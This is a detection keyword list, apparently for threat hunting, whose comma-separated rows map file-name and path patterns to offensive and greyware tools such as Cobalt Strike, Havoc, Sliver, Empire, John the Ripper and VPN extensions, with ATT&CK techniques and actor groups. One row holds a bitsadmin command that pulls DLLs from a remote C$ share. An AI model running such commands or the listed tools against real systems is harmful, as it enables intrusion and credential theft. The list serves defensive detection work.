-*betterdefaultpasslist*,offensive_tool_keyword,betterdefaultpasslist,list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing,T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119,TA0006 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/govolution/betterdefaultpasslist,1,1,N/A,N/A,6,585,151,2021-03-11T11:32:17Z,2016-09-24T16:21:44Z -*BetterSafetyKatz.*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*bfidboloedlamgdmenmlbipfnccokknp*,greyware_tool_keyword,PureVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bgetprivs*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bhashdump*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bhd_enum_dconly*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*bhnhkdgoefpmekcgnccpnhjfdgicfebm*,greyware_tool_keyword,Wachee VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bhttp_x64.dll*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*bibjcjfmgapbfoljiojpipaooddpkpai*,greyware_tool_keyword,VPN-free.pro,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bigb0sss/goPassGen*,offensive_tool_keyword,goPassGen,Easily-guessable Password Generator for Password Spray Attack,T1110 - T1110.003,TA0006 ,N/A,N/A,Exploitation tools,https://github.com/bigb0sss/goPassGen,1,1,N/A,8,1,20,3,2020-06-04T23:13:44Z,2020-06-04T22:33:37Z -*bihhflimonbpcfagfadcnbbdngpopnjb*,greyware_tool_keyword,DEEPRISM VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bihmplhobchoageeokmgbdihknkjbknd*,greyware_tool_keyword,Touch VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bin/*/PS2EXE/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bin/addusertogroup.x64*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*bin/bof_c.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*bin/bof_nim.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*bin/dll/merlin.c*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*bin/icmpsh/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bin/ldd2pretty*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*bin/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*bin/localrelay*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*bin/masscan*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*bin/setoolkit*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,1,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*bin/setuserpass.x64*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*bin/SillyRAT/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bin/striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*bin/void.zip*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Bin\bin32\zlibwapi.dll*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Bin\bin64\zlibwapi.dll*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*bin\SillyRAT*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bin\void.zip*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*binderlabs/DirCreate2System*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*binwalk -e image.png*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*binwalk*,greyware_tool_keyword,binwalk,Binwalk is a fast. easy to use tool for analyzing. reverse engineering. and extracting firmware images.,T1059.007 - T1060 - T1057 - T1142 - T1102.003,TA0002 - TA0005 - TA0009,N/A,N/A,Exploitation Tools,https://github.com/ReFirmLabs/binwalk,1,0,greyware tool - risks of False positive !,N/A,10,9640,1442,2023-08-23T23:11:31Z,2013-11-15T20:45:40Z -*BishopFox/sliver*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*bitb_server/phishing.ini*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,1,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*bitcoin2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Bitmap-Elevate*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*bitquark_top100k_sublist.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*bits_ntlm_token_impersonation.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bitsadmin /transfer debjob /download /priority normal \*\C$\Windows\*.dll,greyware_tool_keyword,bitsadmin,bitsadmin suspicious transfer,T1105 - T1041 - T1048,TA0002 - TA0003 - TA0010,N/A,N/A,Exploitation Tools,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*bitsadmin/nopowershell*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*BitsadminStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bitshares2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*bitwarden2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Biu-framework*,offensive_tool_keyword,Biu-framework,Biu-framework Security Scan Framework For Enterprise Intranet Based Services,T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - T1599,TA0011,N/A,N/A,Frameworks,https://awesomeopensource.com/project/0xbug/Biu-framework,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BKDR_JSPSHELL.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*bkerberos_ccache_use*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bkerberos_ticket_purge*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bkerberos_ticket_use*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bkeylogger*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - 